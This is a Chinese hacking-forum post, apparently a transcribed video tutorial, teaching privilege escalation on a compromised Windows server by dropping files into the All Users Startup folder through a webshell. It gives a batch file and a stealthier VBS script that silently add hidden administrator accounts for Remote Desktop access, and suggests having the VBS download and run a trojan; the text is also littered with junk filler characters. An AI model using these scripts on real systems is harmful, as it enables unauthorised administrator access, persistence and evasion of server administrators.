- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是* Z; N6 l8 T' l& h
启动 提权5 ~) e: I8 I2 Q0 b/ Q
C:\Docume~1\All Users\「开始」菜单\程序\启动& V& c+ O3 q f+ m: k' R
在这里必须有写入权限 否则此方法无效
! F& x2 n7 e2 D- L8 N* u% Q% \4 X因为我是在网吧 这里显示不了路径! o/ \5 Z$ q. ]9 Z" ^6 @8 q$ S9 m) P3 c
我去服务器上演示给大家看1 r+ U( m/ l% j; P( g$ B
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的# i. Z. K2 v- C5 F3 ]0 b7 q
文件 从而运行我们的文件9 \ G. C% T! y, T
这里有两中方式 第一种是批处理
& ]& C3 T$ S5 U+ J C1 T我们来看下目前 我机器上的用户组# q) u* m, w: H3 @: q2 e7 n
目前我们没有521这个用户; W7 n! o: Z% ^# P" v! I
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示& J- u6 n4 W4 G) h) z, e
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
+ u5 E4 V# f$ j a: Y下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的 T7 Y* D9 K4 J: C* C7 _, f+ ]+ R1 Z
大家看 已经成功加入了WMMY用户2 o& Y* q1 ]9 K2 x+ R( v8 k* S f
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了& w1 M$ }3 ?5 Y6 ~6 ]* m# B
当前终端服务端口: 3389( J/ F- e! R! b0 {3 s
系统自动登录功能未开启6 v0 w( x& r7 ?# b& \- N4 R. D9 [
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
0 O6 C5 M- q, R5 d& X) w' yC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
, p4 }: R4 l6 q4 D第一种隐蔽性太差 我们就用第二种吧
1 R! K: J1 q( ~+ e已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去 |8 J( c! I0 r& d
从而取得了3389的登陆权限
" X5 X/ _+ z# O- t4 T; @其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
7 a" i$ A; L+ N- v* F基本原理都差不多 我就不多介绍了
" }5 y- I+ O g教程结束```
, @1 H' b: |) y* ?@echo off
" p2 z0 P5 Y9 K/ |( R! U" Gnet user 521 521 /add* h7 D) Z2 }0 I& I* f' o3 d$ J7 B
net localgroup administrators 521 /add7 P7 C, W! {0 O6 R
( |# K6 r7 i" C: d; H
on Error Resume next; }8 e; C; U! s8 b; [7 o
set wshshell=createobject("wscript.shell")9 Q. v; V, b9 H: z/ ]# y/ ]( ?
a=wshshell.run("net user wmmy$ 1227 /add",0)
# W; h$ X% \( d2 `# Ia=wshshell.run("net localgroup administrators wmmy$ /add",0)
% A0 e1 ?- K, Y; D2 V( `/ l! ~! ]4 {8 q: {
7 J( s# l- Z: Q0 m# X- \/ m6 N5 ~ I点击下载
4 {2 p( i: C) G5 x. h |
-
2
评分人数
-
|